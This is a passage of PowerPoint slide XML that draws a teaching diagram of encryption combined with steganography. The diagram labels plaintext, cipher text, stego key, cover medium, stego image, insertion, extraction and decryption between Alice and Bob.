              </a:rPr>
              <a:t>xt</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4334089" y="5698872"/>
            <a:ext cx="767593" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>Cipher</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="10" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>xt</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5931069" y="4117539"/>
            <a:ext cx="825475" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>Stegano</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="-129" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6300324" y="1263629"/>
            <a:ext cx="1001644" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>Cover</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="-129" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>medium</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7701203" y="4219760"/>
            <a:ext cx="834285" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>Stego</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="-159" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>image</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707245" y="5698872"/>
            <a:ext cx="629174" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="10" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>ext</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5965489" y="5624811"/>
            <a:ext cx="845610" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" b="1" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>Extraction</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2200958" y="5624811"/>
            <a:ext cx="893428" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" b="1" spc="40" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>De</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" b="1" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" b="1" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>rypt</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" b="1" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>ion</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7813855" y="2002141"/>
            <a:ext cx="755009" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" b="1" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>Insertion</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387091" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59055">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3620745" y="3891916"/>
            <a:ext cx="115766" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="58419">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58427" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3853355" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59055">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4085966" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59055">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319618" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59055">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4552228" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59055">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785883" y="3891916"/>
            <a:ext cx="115766" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="58419">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58427" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5018493" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59055">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5251103" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59055">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5484756" y="3891916"/>
            <a:ext cx="115766" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="58419">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58427" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7083821" y="3891916"/>
            <a:ext cx="115766" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="58420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58427" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7316432" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59054">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084790" y="3299155"/>
            <a:ext cx="713484" cy="305020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1982" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ALICE</a:t>
            </a:r>
            <a:endParaRPr sz="1982">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4203703" y="4114854"/>
            <a:ext cx="524731" cy="305020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1982" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>BOB</a:t>
            </a:r>
            <a:endParaRPr sz="1982">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1317589" y="2117610"/>
            <a:ext cx="765076" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="386080">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="385834" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="007F00"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="object 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051928" y="2067543"/>
            <a:ext cx="153519" cy="101926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="77469" h="51434">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="51058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77377" y="25266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="007F00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="object 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3091896" y="2117610"/>
            <a:ext cx="1060788" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
